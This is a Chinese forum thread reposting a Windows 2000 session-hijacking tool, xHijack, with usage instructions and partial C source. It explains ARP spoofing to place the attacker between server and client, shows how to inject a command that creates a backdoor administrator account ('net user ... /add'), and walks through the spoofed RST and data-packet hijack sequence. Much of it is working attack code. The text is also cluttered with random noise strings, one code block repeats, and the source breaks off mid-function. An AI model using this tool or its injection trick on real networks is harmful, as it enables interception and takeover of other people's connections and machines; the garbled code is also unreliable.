数学建模社区-数学中国

标题: 再谈交换环境下的会话劫持(For windows2000) [打印本页]

作者: 韩冰    时间: 2004-11-21 01:44
标题: 再谈交换环境下的会话劫持(For windows2000)
第一步是开启IP Routing的功能,修改注册表
: Y9 E  H" L  ~HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter为0x1,重启系统即可。
- ]3 r* c, C6 N) c4 ~; A! `第二步是ARP欺骗,具体原理我就不说了。 ) H; O. V, p4 U5 M1 y+ T
第三步就是开始劫持啦。
; o' l3 \- t% I! O
& P. k9 F$ B. B$ ]我写了个程序xHijack可以实现第二、三步功能,使用如下: + w4 C/ S) F- j1 v
+ l; q& o3 t9 D, Y) c# h8 H
Usage: xHijack ServerSide ClientSide & Z4 e, c: C& H1 G! {
* L- U" k  f2 m+ ?% i6 `
下面根据三种不同的情况分别说明如何输入参数:
1 i, C+ Z5 V. `# d7 q<1>服务器、客户端、劫持者处于同一局域网,接在同一交换机上(或交换机级连?)。
( t! w: Q1 Z* z0 o2 t假如服务器的IP是192.168.0.2,客户端的IP是192.168.0.3,提供如下参数给xHijack即可
* v: M* C/ ^) U& L5 p% q( wc:\>xHijack 192.168.0.2 192.168.0.3 $ C' }1 f5 e2 |: b8 k
劫持前数据流程:server <--> client
* o( i4 z! d1 A  D. l劫持后数据流程:server <--> hijacker <--> client 9 t& w, }: u0 R  |. s3 I- M
6 a( k' K& H- u3 @6 H# L
<2>服务器、劫持者处于同一局域网,客户端处于别的网络。 . g7 D$ v! K: M; n5 r
假如服务器IP是202.202.202.2,服务器的网关是202.202.202.1,提供如下参数 ) Z3 E% \8 y+ q
xHijack 202.202.202.2 202.202.202.1 - [" i* Q( l5 u( a! G" O
劫持前数据流程:server <--> gw <--> routes <--> client 8 @, b: `, ?5 U7 z, {: Q
劫持后数据流程:server <--> hijacker <--> gw <--> routes <--> client
* z* i  Q7 Z9 p5 m
6 N' ?5 w1 z# N5 s" C2 D1 G! T<3>客户端、劫持者处于同一局域网,服务器处于别的网络。 ; R( g# ?! Q: D
假如客户端的IP是192.168.0.2,网关是192.168.0.1,提供如下参数 6 @1 o4 B5 ~1 _9 H4 b$ n/ {
xHijack 192.168.0.1 192.168.0.2 2 |# r. a6 S, W/ A. I' |- u3 Q" ?
劫持前数据流程:client <--> gw <--> routes <--> server   k/ o# I7 |/ U, _& }% @) ^" f
劫持后数据流程:client <--> hijacker <--> gw <--> routes <--> server
* V4 n& I2 y* @8 Y  M* X5 ^! T& r6 N8 z4 n
输入两个参数后,会提示你选择网卡,然后会提示
! I& s/ ^  W% K2 Rl        <-- List all connections 4 w; A4 P& L' r! P6 u: Q  l; n6 [
r x       <-- Reset the number x connection " T, B0 T$ t' u0 C8 ^& }
w x       <-- Watch the number x connection , W# S/ {5 t" d( U
h x command   <-- Hijack the number x connection to execute command
3 Q* S  q0 r8 ~* f7 J6 ~) _! I5 O. v  P% M' Q3 @6 F+ N
list、reset、watch命令我就不解释了。 # u) k9 \: A# V: z  R# ^7 o3 n
假如现在有如下连接 1 L; _2 k3 Q/ A+ I; G
(1) 202.202.202.202:23 <--> 192.168.0.3:2345
' j" `2 i, R" ~1 t7 R9 E; z7 `我们想要劫持这个连接运行我们的命令,输入 . h; B- [+ \' d: p
xHijack>h 1 "&net user ey4s hijack /add & net localgroup administrators ey4s /add" 5 G) l) P$ b: g; r2 i' z- ^/ `
为什么命令前面要加&呢?假如客户刚发送一个字符p过去,我们不加&的话,服务器端接受到的就是
+ l6 l/ g, N& L4 v) _pnet user.....了,加了&后就成为p&net user.....,这样就不管前面客户输入了什么,我们的命令
6 N4 Q2 g" \3 p9 z" L2 N$ h- _都能够运行了。以上都假设服务器是windows 2000,unix下加什么字符,我不知道,我是unix白痴,呵呵。 * O9 G$ R6 h3 m) u. c' A. J

  X4 Y# B3 J/ z5 f: @/ c4 F$ Q: s劫持的流程如下:
% t/ `( w* y' O( c9 p1 L# L<1>伪装成Server给Client发一个rst包
% d% K  s9 V9 y: M$ A<2>伪装成Client给Server发了一个数据包
$ f8 y; y9 F5 W$ ?<3>Server回一个ACK包给client % Q( P! B9 X; c3 }
<4>因为Cleint的连接已经给我们reset掉了,所以client回一个rst包给server " ]! j2 h$ L/ B9 |
2 Z+ a. D2 |- ]) h# e4 b2 k, J
这样的话,我们只能发一个伪造的包,但我想已经足够了。 $ t  R$ ^# j% O- j- E3 `. ^
想要一直劫持那个连接也可以,如下
2 h# D& f. a9 T1 j# |% F<1>伪装成Server给Client发一个rst包 2 r# u5 x% Z" ~  ?) k0 z
<2>欺骗Client,告诉它Server的MAC地址AAAAAAAAAAAA
0 n6 P; t0 q- K& @" g  z+ }9 M<3>伪装成Client给Server发了一个数据包 ; }# K. P, }6 K7 [% ~' `$ ^$ e+ j
<4>Server回一个ACK包给client
1 A6 H9 H9 |( ?% {# P5 k3 p  a" g<5>Client回一个rst包给Server,但Server收不到,因为Client发到AAAAAAAAAAAA了,呵呵。
, u* q+ R5 o' ?<6>然后Server发给Client的包都由我们来处理,包括给Server回ACK包等等。
& Z) _. Z4 B, m+ s2 {4 S! L6 Z6 B. x
不过这样比较危险,在我们劫持的过程中,Client与Server的通讯始终是断开的。
: |# u# s8 h( ]! D4 |6 g: o% x$ W% j! c2 D3 }, f

! a. I9 z+ u) n/ T& w刚开始看TCP/IP协议,调程序调得头昏脑涨,说明也写的乱七八糟,呵呵,程序代码也可能存在很多问题, 8 m2 f9 j4 z( {1 x
还请各位多多指点。
/ t/ D1 n% Q+ z9 E6 x$ X- E
1 v! S. V0 v+ N8 OBTW:我没有空间,编译好的程序没地方放:(
0 M/ H. N- B/ W( J9 K2 U+ S3 @3 n% Q, \, A

2 F8 }0 p, j5 p. q$ Q) K& W2 H. w3 J/ O
6 p8 q6 y- Y3 y/ E+ D参考资料 2 R9 D9 F/ k* w3 w' f4 i
<>交换环境下的会话劫持http://www.xfocus.net/article_view.php?id=375 0 D, Z* _" d5 p2 \) W
<>交换网络中的嗅探和ARP欺骗http://www.xfocus.net/article_view.php?id=377
; E/ \4 R, E+ a
- X$ d+ @# B- s# _6 L: A( `6 I! Z: _* L
以下是程序代码 " N; Y1 L) X/ h, @& ?% L
---------------------------------------------------------------------- - j! B: e9 y' M5 o) x
/*-----------------------------------------------------------------------------
/ t9 ^8 F; M4 }5 B4 q) rFile      : xHijack.c & K0 N! I  W! h- |3 j0 u
Version      : 1.0
- O+ i1 g6 r. Y8 z& D3 I7 WCreate at    : 2002/8/12
- e( y( D2 ?* k0 }( l# x& BLast modifed at  : 2002/8/19
6 s' L" u3 F- X7 z& O8 v& `Author      : eyas 9 {( f) B. V3 z0 @+ `
Email      : ey4s@21cn.com
; d6 C# |2 a2 [5 F# C8 U: M0 jHomePage    : www.ey4s.org
7 ~0 U' ^0 c. q& {感谢refdom和shotgun发布的源代码,使我获益非浅。
; R+ I  l  h0 f2 K6 e  QIf you modify the code, or add more functions, please email me a copy.
+ K0 j7 ^$ J( F. g/ t$ |; |, F& O+ R& h6 C* a7 i9 i
备注:
) M  ~# m) O7 \<>没有考虑IP头、TCP头超过20字节的情况
% I( ]1 O: Y* }2 ~/ l, X! ?4 I! U<>没有考虑数据包分片的情况 & L7 C) [9 Q; ~. e5 c% }) t
<>没有对截取到的TCP数据进行解码,如TELNET,虽然是明文传输,但是TCP数据里面包含了
" x  ]7 \8 y: E5 B. ?, |显示格式、位置等信息,直接打印出来,显得很凌乱。但如果是IRC、SMTP、POP3等就没问 ( K( X$ s3 g% m2 @6 j* X
题了。
/ R( Q+ N; ~9 y; {1 e: w. d; Y' U% x" j8 {
也许下一版本会修正这些问题,也许不会有下一版本了。
. q) b9 B+ ^& b0 ~  f# q% u- _+ W/ V' c- q, H( P0 b/ j( ]/ e
-----------------------------------------------------------------------------*/
, H4 g( Q# n( o- C' |#include   o% y( g) a5 Q) l, x3 x
#include
' ]8 o% l2 J: k+ O) e#include / Y2 h1 Y8 c3 F# M% r7 q+ S6 _8 `
#include ; G6 R& q; \7 U* V( b
#include " _% C* j% ?3 z: K
#include # H) e' `4 {- O5 L/ W
#include 7 `; ]  m. d( g7 H7 ~0 I
5 T, s; j' K8 F, v
#pragma comment (lib, "packet")
( B$ ^" Y$ Q7 W, U#pragma comment (lib, "iphlpapi")
& w; |1 e( B' g8 y, q# p' P#pragma comment (lib, "ws2_32")
' {$ o: w$ V. m9 T
( E. Y2 L$ p! `. K6 x  c#define Max_Num_Adapter 10
' f7 F5 s. t4 Q/ t2 O2 O#define Max_Num_IPAddr  5
0 r, ?8 \. x6 i: z9 B/ C#define EPT_IP      0x0800      /* type: IP  */ 3 ~' G' L8 j, {! P$ |
#define ARP_HARDWARE  0x0001      /* Dummy type for 802.3 frames */ $ ]" Z5 x+ H' y4 X) y
#define EPT_ARP      0x0806      /* type: ARP */ 3 z" d7 ]! L% V0 x" ?

, q9 z1 q0 X3 ^3 \: L) n* W#define  ACTION_NONE    0
" \) \" w. J# U#define  ACTION_WATCH  1 ; _1 E# [5 i- t/ K! P8 W
#define  ACTION_RESET  2 ) Z. ^4 U0 e  M& S8 P4 Q
#define ACTION_HIJACK  3 8 o; ^; }* k* C5 i3 m, u

. k! @, [! u7 X- Y0 l! t/*以1字节对齐*/ , u! P" L( B2 x$ F
#pragma pack(1) ' P: ?9 }1 E& p" j
typedef struct _ehhdr ' z7 h3 Z! R+ n
{ 3 K* m- D+ l2 z9 l! w
  unsigned char  DestMAC[6]; 7 V9 d/ Z) U; t9 n$ U
  unsigned char  SourceMAC[6]; ) ~0 g- r; O+ A4 Q; G
  unsigned short  EthernetType;
" p6 ~; `& \8 I. g' c5 ~}EHHDR, *PEHHDR; 5 E2 ]( S/ l2 g; A
8 e6 J& ^. }9 ?5 T& x
typedef struct _iphdr        //定义IP首部
; o2 R  G; A3 W/ \5 \* O{
2 O: M* H0 ^, _8 d1 u$ P8 k6 S  unsigned char h_verlen;      //4位首部长度,4位IP版本号
  ^+ s2 A" ]0 g, u  unsigned char tos;        //8位服务类型TOS + w4 i: [( ?# |" ~! @/ m4 ]
  unsigned short total_len;    //16位总长度(字节)
" e% U) R2 a2 D  unsigned short ident;      //16位标识
( q5 e" @$ \$ X! E4 e8 u  unsigned short frag_and_flags;  //3位标志位
6 {6 j+ F3 L4 S/ v* O: y* q; {% _( n  unsigned char ttl;        //8位生存时间 TTL
" c; r' p6 @" c2 b  unsigned char proto;      //8位协议 (TCP, UDP 或其他) 4 w0 E9 M0 u! N
  unsigned short checksum;    //16位IP首部校验和 . }% U2 ?: Y* l) Z
  unsigned int sourceIP;      //32位源IP地址
* _" V* \" d& x# r1 T  unsigned int destIP;      //32位目的IP地址
7 E; ]( q! d$ }}IPHDR, *PIPHDR;
$ J3 L9 z+ k$ K4 Q/ I0 Q) p: k
3 s: Y8 B9 I4 e. e* X( `9 Otypedef struct _tcphdr        //定义TCP首部 5 G1 p6 C# P/ Q6 f9 H
{ + K8 d' j: U2 F3 X( m- u1 @$ [& q& ~
  USHORT th_sport;        //16位源端口
. Y& h  n* X1 o" M  USHORT th_dport;        //16位目的端口
6 ^- V! K2 L5 ?/ S# ^7 Y  unsigned int th_seq;      //32位序列号 & f! |$ \- i5 v
  unsigned int th_ack;      //32位确认号 4 u( @  W+ ]- }: [
  unsigned char th_lenres;    //4位首部长度/6位保留字 ( Z9 c, O. q2 H' p- F" b2 [
  unsigned char th_flag;      //6位标志位 4 p; d. l$ ^1 c3 t* D
  USHORT th_win;          //16位窗口大小 8 c. v+ u5 a# _
  USHORT th_sum;          //16位校验和
# Y/ @4 G: x. A5 p" b6 _. v% J  USHORT th_urp;          //16位紧急数据偏移量 + A1 V; r' N# b* g
}TCPHDR, *PTCPHDR;
7 i8 u% f4 T! M4 e3 q+ U/ ~1 v5 D, [  w& |% x' L) j( F! J
typedef struct _psdhdr        //定义TCP pseudo header 8 G+ C' w8 e6 z, H0 N8 U
{               9 ^  j. N! J; S6 X; X
  unsigned long saddr;
' f8 U' a' w8 O0 M) B  unsigned long daddr;
; s0 D3 v: p# h  char mbz; ( t4 }/ y) V1 @! l* r' n' e" S
  char ptcl;
: V; ]$ Z. f) D8 W/ \5 N  Y  unsigned short tcpl; 7 p0 x2 Y! i# ]7 O8 n: l
}PSDHDR, *PPSDHDR;
: {( s% [6 L  y) s% X* F9 |
' n+ U, \* @3 [- e' xtypedef struct _arphdr
$ C8 X3 i* q  S# R$ \. w% h' `, y{
9 p8 M( f' c* T, I  unsigned short  HrdType;//硬件类型 ' q# s7 S; E6 P% b  d
  unsigned short  ProType;//协议类型
: F* [( q- o7 f! o  unsigned char  HrdAddrlen;//硬件地址长度
4 P& e5 ]' {& n! L9 M  unsigned char  ProAddrLen;//协议地址长度 ) O! A& Q' Q4 `1 Z1 h
  unsigned short  op;//operation
' [+ o$ l# E# f* w' C- k" }  unsigned char  SourceMAC[6];/* sender hardware address */
. X; k# r% E( V9 A  unsigned long  SourceIP;/* sender protocol address */
& b( a- P/ Z! {4 d& d! |  {  unsigned char  DestMAC[6];/* target hardware address */ 5 ^5 ~3 I, q9 o; V, K$ D
  unsigned long  DestIP;/* target protocol address */ : Q1 R7 d8 P5 Y" F1 {  ]
}ARPHDR, *PARPHDR;
& W; H0 e9 q: b  q: M
- E3 p( W( a6 A: J) a% I; _4 ttypedef struct _ArpPacket , N; U  A" G! W: h$ m) q5 i
{ 2 K" u! L1 q2 F" U5 o7 a
  EHHDR  ehhdr;
  K! n; {8 K/ O8 y3 y- X  ARPHDR  arphdr;
) L5 V  v* {4 w4 E, o}ARPPACKET, *PARPPACKET; ' e8 ]0 V" p$ ]' [+ K, g# _
1 q. U' ]; c, ~" k7 F- h  u
typedef struct _tcppacket
+ y  O1 r% q7 X0 _' ~{
" l7 W! Y% K' T  EHHDR  ehhdr; ' I4 X+ e! i* x3 Y( }
  IPHDR  iphdr;
- ~3 H) _8 C0 s+ A* p7 @5 W& Y  TCPHDR  tcphdr; & b$ q) B' _1 O+ ~: X) k
}TCPPACKET, *PTCPPACKET; 7 T2 A% `* ~; f3 T
4 V/ z: P" C3 b7 [2 W, A
typedef struct _conninfo
3 e5 ~8 \1 K/ B% h{ $ o& O1 z8 V! i! B. B
  DWORD  dwServerIP; % U5 @+ N  ]! s: C( |6 d
  USHORT  uServerPort; ! M& z) R9 G) f" k% l8 J
  DWORD  dwClientIP;
0 ^& S$ U. V; w$ O  USHORT  uClientPort; 2 Q4 D) F4 z) h! M( t
  DWORD  ident;//标识 7 `9 S! ]( w6 Q2 {. G
  BOOL  bActive; & y& w. O0 _1 A
  struct  _conninfo  *Next; / @2 U# q! S6 t' D/ R) K0 \, ?1 J
}CONNINFO, *PCONNINFO;
% o3 l$ W0 P; n& p  Z8 J' ~1 J# G# C" H
//定义全局变量
作者: 韩冰    时间: 2004-11-21 01:44
unsigned int  g_ServerSideIP,
% n: z+ o" K& Y3 t4 O( z& ~5 l+ G/ X        g_ClientSideIP,
- h/ M4 r6 ?8 P& F2 N; T/ b        g_OwnIP[Max_Num_IPAddr],//本机IP地址列表
$ T) K. M; G' r' M# Q        g_TotalIP = 0;//
! W% `3 ^# x! a+ M7 d! wunsigned char  g_szOwnMAC[6];//本机MAC地址
/ v7 `, d+ g( V0 Q" qunsigned char  g_szClientSideMAC[6]; $ h  a& r! V3 p1 _
unsigned char  g_szServerSideMAC[6]; 6 ?6 h0 q) e4 o
char      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP标志位 7 W' @4 x( n7 e
LPADAPTER    g_lpAdapter; 0 ]8 E# r- x  H/ O/ B, s
//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread 4 @  ^8 S! A* ?* u
HANDLE      g_hThread[4];
  D* E+ G, v# Z5 _3 j: {char      g_szCommand[128];//command to execute after hijack 9 q0 F8 o2 f! r9 Y' P, B$ n. b  s, \
DWORD      g_dwAction;//action type
, I6 n3 y2 X  _# MDWORD      g_dwCtrlConn;//action 所控制连接的标识
+ U! l  y- o' j3 f% `8 ~DWORD      g_ident;//节点标识,递增 4 e" R( `  G9 ?1 S7 {' \. X
PCONNINFO    g_pCurrCtrlConn = NULL,//action当前所控制的连接的信息结构指针 8 ]7 z+ N' {" ~  ^! _, @, N! g3 E* w
        g_pConnHead = NULL,
+ x( H* z9 X4 F5 v2 v) ]+ ?        g_pConnLast = NULL; 9 N  p+ C! B% q' f# o( B
char      g_szSendPacketBuf[1514];
1 `/ y2 g' Q0 G# {  D, R7 k* {" i! ^LPPACKET    g_lpSendPacket; % G6 c" y, b" w) u' I' |( a
//函数 3 e+ O# Z4 g, k3 d
void      usage(void); 8 U1 T+ {$ }) M" o
void      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL); ( \1 W) t$ \6 y7 X
void      ListAllConnection();//列出当前所有的连接 7 ^2 T/ ^4 r9 N' N9 n4 t" p/ n
void      ResetActionAllFlag(); + d0 f7 b# K9 g1 L4 \3 e
USHORT      checksum(USHORT *, int); , n3 z! C0 ]' @: @
BOOL      GetMACAddr(DWORD DestIP, char *pMAC);//取得目标IP的MAC地址 % l4 j2 }# _3 `$ w; t
BOOL      IsACKPacket(unsigned char);//判断是不是一个纯ack包 / i; z, W  N5 Z- M
LPADAPTER    InitAdapter();//初始化一些参数和全局变量 % q( k. h8 W7 c
BOOL      SendRstPacket(unsigned int, unsigned int);//伪装成server给cilent发送rst包 % _" E5 B" @4 r) g
BOOL      SendHiJackPacket(PTCPPACKET);//伪装成client给server发送我们的包 $ S9 P3 p8 k6 Q7 S* [7 t
DWORD      GetConnNum(char *, DWORD, DWORD *); 8 u9 k! i! e. s. R9 R5 A
DWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL);
8 I: h; ~& q! `3 _8 m$ cDWORD  WINAPI  ArpSpoofThread(LPVOID);//进行arp欺骗的函数
9 [1 q7 K& O3 @DWORD  WINAPI  AnalysePacketsThread(LPVOID);//分析处理接收到的包
1 D: n' i% Y) f; D, VDWORD  WINAPI  InterfaceThread(LPVOID);//
8 ^! S3 p2 t- Y: H8 }BOOL  WINAPI  CtrlEvent(DWORD);
" v" v6 s, w  l+ N$ k* g
+ q8 r, z$ z0 o
" j, ]% `8 M0 s% t3 e/ m. L- s
! g! ~; x4 p2 k. l+ h- uint main(int argc, char **argv)
1 l0 X. z! i# V. |- Q6 v' Y{
) b% y- y$ }6 R% q! `+ J/ i2 N  struct    bpf_stat stat; ) h: D6 ?4 v: T: m6 {: Z# M
  int      i;
) j& X+ f# D3 f; P4 ?4 E. B
! g3 d3 W3 B* i- m3 d. _: N  usage(); - f0 ], E8 X1 [1 N
  if (argc != 3) return 0; / C; Q) j4 V: T% \! m% Z% [  t5 x
  //取得参数
$ c' R3 H2 E' n/ ^  g_ServerSideIP = inet_addr(argv[1]);   s& z7 N3 k* I! U, e
  g_ClientSideIP = inet_addr(argv[2]);
' B4 D! b; E, {  //初始化adapter & 一些全局变量
4 w! F# s& a) S: n2 y9 H  g_lpAdapter = InitAdapter();
$ d- h7 I1 Z5 m) c5 c) ?/ t& M  if(!g_lpAdapter) return 0; 4 ^2 l( Z! p7 {% {' E! d, C
  //get ServerSide MAC & ClientSide MAC   K' ]% k# [& U0 P
  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0; ; [% o5 e; X6 L% h0 p# g% ^
  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0; ! S5 y3 K. Z8 F: U4 Z$ N
  //create arp spoof thread     
' P- z8 `" k- [% r2 ?/ x) S  i = 1;
5 o1 g- @: |3 r+ P1 J& V  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0); 8 v: b1 Y, M8 D" T3 v3 Q
  Sleep(500); * H, V# v% C5 y  r; z
  i = 2; 2 K& v' c+ Z, u/ r! E
  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
* ]: C8 L4 n# W4 I: P  //create analyse packet thread
; l& z2 _( K: ]+ D  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0); 8 v+ ?$ x- x! O8 f) s
  //create interface thread
0 E" `# T0 S: }; X  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
5 i+ J2 ~( z1 i  //set console ctrl handle
% K" p/ S! Y; E6 h; z: j  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE)) 4 R3 Y; Q5 u3 d
  { " }! \) \# B/ |( ^: g
    printf("SetConsoleCtrlHandler error:%d\n", GetLastError());
. K) z# |2 o5 L8 \* @1 b1 n    return 0; , V$ I$ k$ ?' Q* V
  } . m7 e& O1 c0 g, I
  //wait for any thread exit
+ i1 K/ \; e$ R  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE);
9 r; Y7 `& C1 @6 k  //print the capture statistics
7 }- S' U9 h5 a  if(PacketGetStats(g_lpAdapter, &stat) == FALSE)
8 s1 _* Y" L* H& H* T7 \) @    printf("Warning: unable to get stats from the kernel!\n");
2 i" t# T! ^% K$ r% H  else
0 l9 }) r  q+ i% T  l9 X    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop); 1 p: ?+ [1 I" s6 |
  //free resource   7 [$ d; p5 O5 y& ^' c% U
  PacketFreePacket(g_lpSendPacket); 2 |/ f; L" ]# N2 V9 C
  PacketCloseAdapter(g_lpAdapter); 0 D9 \1 L4 k+ h8 k$ q* ?& o6 M
  return 0; + R$ i1 w, l9 K( C
} 0 E. }/ Z1 E, K& {2 l0 `3 K4 N
: z3 E, a& Z) q
//
* z. t! k# }. l+ u0 X: I9 m//功能:重置所有于ACTION有关的标志
( X2 Z5 x/ W2 _//
作者: 韩冰    时间: 2004-11-21 01:44
unsigned int  g_ServerSideIP, 6 Q: h: r8 V- A1 c5 [2 W
        g_ClientSideIP, 1 m5 d2 w  F& G; a
        g_OwnIP[Max_Num_IPAddr],//本机IP地址列表
7 K! g* U  U0 ~! x6 {( w0 e; t        g_TotalIP = 0;//
0 W- v, X  k4 w& E9 t0 c/ b8 qunsigned char  g_szOwnMAC[6];//本机MAC地址
6 |$ C/ Z0 L& ~" E1 V3 f' nunsigned char  g_szClientSideMAC[6]; 5 [! X* M9 Z$ `
unsigned char  g_szServerSideMAC[6]; ' d; N- z4 i6 M" G
char      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP标志位
" M* ]' m9 y' W: N# [* E$ s: h3 @LPADAPTER    g_lpAdapter;
4 a  e, t9 D) p//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread 2 y& Q$ z. z, G' w8 B# W
HANDLE      g_hThread[4]; 6 r) C7 R, K8 p# G8 h# W
char      g_szCommand[128];//command to execute after hijack ) ]0 @/ X$ s, w4 B% Y3 m* G; M
DWORD      g_dwAction;//action type $ y( E& g, b- }3 [0 J+ N: `! ]. h
DWORD      g_dwCtrlConn;//action 所控制连接的标识
# F( r" H1 `- [DWORD      g_ident;//节点标识,递增
9 D! q$ r; E. e- l' w8 x$ F# e# _PCONNINFO    g_pCurrCtrlConn = NULL,//action当前所控制的连接的信息结构指针
' o3 f) r, F2 U( y0 w6 a7 o% }1 o        g_pConnHead = NULL,
8 }; O% }$ \3 ^5 P# W3 |        g_pConnLast = NULL;
0 M* E4 B$ q5 }7 pchar      g_szSendPacketBuf[1514]; ) w' h" {/ t' O" M
LPPACKET    g_lpSendPacket; ( p$ ?; G6 x0 c1 x  F
//函数
* r, y) E4 h0 e$ _; Yvoid      usage(void); 2 D+ g+ ~( Y& S  t" [
void      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL);
- E; j9 j7 u" e% V9 M: j" x- o3 ivoid      ListAllConnection();//列出当前所有的连接
: i1 H1 _% G" i- j. a: y; G2 r- Kvoid      ResetActionAllFlag(); , T( O" W$ i* |" K6 D
USHORT      checksum(USHORT *, int); 1 ?! b+ @) t" U/ t$ r
BOOL      GetMACAddr(DWORD DestIP, char *pMAC);//取得目标IP的MAC地址 ' d* S, h) Z6 J: y. r8 D
BOOL      IsACKPacket(unsigned char);//判断是不是一个纯ack包 8 ]2 G6 I- w7 ~$ w  G, L* J
LPADAPTER    InitAdapter();//初始化一些参数和全局变量 * o/ x& E; J8 [; b
BOOL      SendRstPacket(unsigned int, unsigned int);//伪装成server给cilent发送rst包 % p( n$ N) V3 o: t& B9 J4 T
BOOL      SendHiJackPacket(PTCPPACKET);//伪装成client给server发送我们的包
# R. v6 G) d0 `6 rDWORD      GetConnNum(char *, DWORD, DWORD *);
3 P$ t! T, w' O, W' SDWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL); 9 B2 C- \2 Z' {! v. t3 ~
DWORD  WINAPI  ArpSpoofThread(LPVOID);//进行arp欺骗的函数
8 B# @( P, x1 e5 iDWORD  WINAPI  AnalysePacketsThread(LPVOID);//分析处理接收到的包 ' \% @- U/ J$ P1 v8 g# X- ]% a
DWORD  WINAPI  InterfaceThread(LPVOID);//
; i& H2 G! r4 x7 HBOOL  WINAPI  CtrlEvent(DWORD); * p' O$ ]$ r6 T! g! A

( Y( A1 q# `# b* ]4 K6 n# n, L+ c
8 [% b$ [' ^2 C1 D+ @, w
int main(int argc, char **argv)
: I. H$ D7 e4 T{ 5 d& U" I$ d8 V1 S+ x. A
  struct    bpf_stat stat; 6 O' F2 _6 C7 Q7 h5 u* Y
  int      i; # V8 I  J+ ~& Q/ }0 S. `
" O- S" }3 ~/ v) G( [% G
  usage();
+ y- Y3 e4 Z; D- r: _0 b' f! n, u  if (argc != 3) return 0; ( ?, H, l' q  h( Q: R3 F
  //取得参数
3 H6 [0 D4 @/ ^6 o5 y; L* F2 F  g_ServerSideIP = inet_addr(argv[1]); - Z6 Q& K% A8 j6 h0 F" L+ \
  g_ClientSideIP = inet_addr(argv[2]); " h7 z$ p8 ^# x' q. u
  //初始化adapter & 一些全局变量 1 E0 c( m- M* Y; l& N7 }* w! ^
  g_lpAdapter = InitAdapter(); ! E! j" v; ^1 T2 j! K
  if(!g_lpAdapter) return 0; 0 C, B: R: S9 u7 t3 P7 p; g
  //get ServerSide MAC & ClientSide MAC
0 }, y$ R1 _+ J4 m7 J2 ?* Z  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0; 8 A# B, N7 h' N! H! `( D. X1 Q4 D( z
  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0; 6 L8 m# N5 P  z( {+ c4 `- c
  //create arp spoof thread     
) S+ ^7 g- f) Y; C1 _  i = 1;
. h+ l8 u* a, d; J$ S0 C  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0); 8 U( f7 G# v& T& M( C4 L
  Sleep(500); 4 Y; h* g( a+ d+ O
  i = 2;
$ Y3 K& J, ~0 j7 K4 g# r0 M  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0); 2 K" x" ~: T6 \% F  ~/ e, h) c( e
  //create analyse packet thread
- L8 i7 s3 Z, s3 {  X+ j8 J  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0);
: Q0 [- u0 _8 y$ f9 Y  //create interface thread 2 v3 ?2 ^* R& ^) ]2 r. z
  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
% _: b, B" n* ~( U$ q+ y+ p( Z  //set console ctrl handle 9 W1 R0 I; {" `
  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE))
7 c6 J9 M* w8 {. k  {
' ]; D1 v$ k7 c* j$ C& Q    printf("SetConsoleCtrlHandler error:%d\n", GetLastError()); * Z% n0 |6 {( J; {) ]+ V( L8 R8 n
    return 0;
0 [; j$ d; y! |) B  }   M$ ~/ y8 D7 P. Z
  //wait for any thread exit 5 p$ d6 b  [. W$ E
  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE); + b0 ~4 C3 U5 E% E  y
  //print the capture statistics ; Y1 p* m" f9 g% y- v$ {9 _( y
  if(PacketGetStats(g_lpAdapter, &stat) == FALSE) ( |& Z" G6 a5 h9 O( K9 y
    printf("Warning: unable to get stats from the kernel!\n");
& _; j8 Q  R- C, ?4 O  else
* x8 o( Y( F" T% _) R8 D    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop);
* H0 A& H# \/ c3 @+ ]  //free resource   
1 e6 t$ q% L1 R  PacketFreePacket(g_lpSendPacket);
: @) L' z& b, d1 l+ T$ c2 |  PacketCloseAdapter(g_lpAdapter);
1 l% E" g' C. b# B  return 0; * z# v' G0 \. k5 D% m0 `
}
* k8 G: R7 l5 s$ J
% j% R( D# \4 o9 U. x$ Q5 m4 T' [// ; g2 M% J. u) r7 H. Q
//功能:重置所有于ACTION有关的标志
% A7 [$ q2 Z$ A//
作者: 韩冰    时间: 2004-11-21 01:45
void ResetActionAllFlag()
2 g6 P  I; v/ v! e9 F& q6 U8 y{ ' T& D# g% ~1 K3 q! F8 _- p/ U
  g_dwCtrlConn = 0;
3 I& A$ K. b0 q* p& r( q0 @  g_pCurrCtrlConn = NULL;
9 g+ j9 r$ @" S; T+ @  g_dwAction = ACTION_NONE; 0 h0 S4 Z$ L5 o$ E$ y, E
} + W& p/ i+ |% [& [; Y- a5 ~2 ?

: T, z. |( m# W/ L# m7 z//
2 K- e. q( `) n//功能:处理Ctrl+C和Ctrl+Break事件 , Z8 `6 ~( T0 K6 y2 H: q7 b
// - Y* X9 s( M1 H  D" K- W/ y
BOOL WINAPI CtrlEvent(DWORD dwCtrlType) ) b7 y# B# I  b1 R
{
4 ^* M, N% W2 i# z, o  switch(dwCtrlType) $ q* W6 {) e( h1 y; A$ x7 K! P
  {
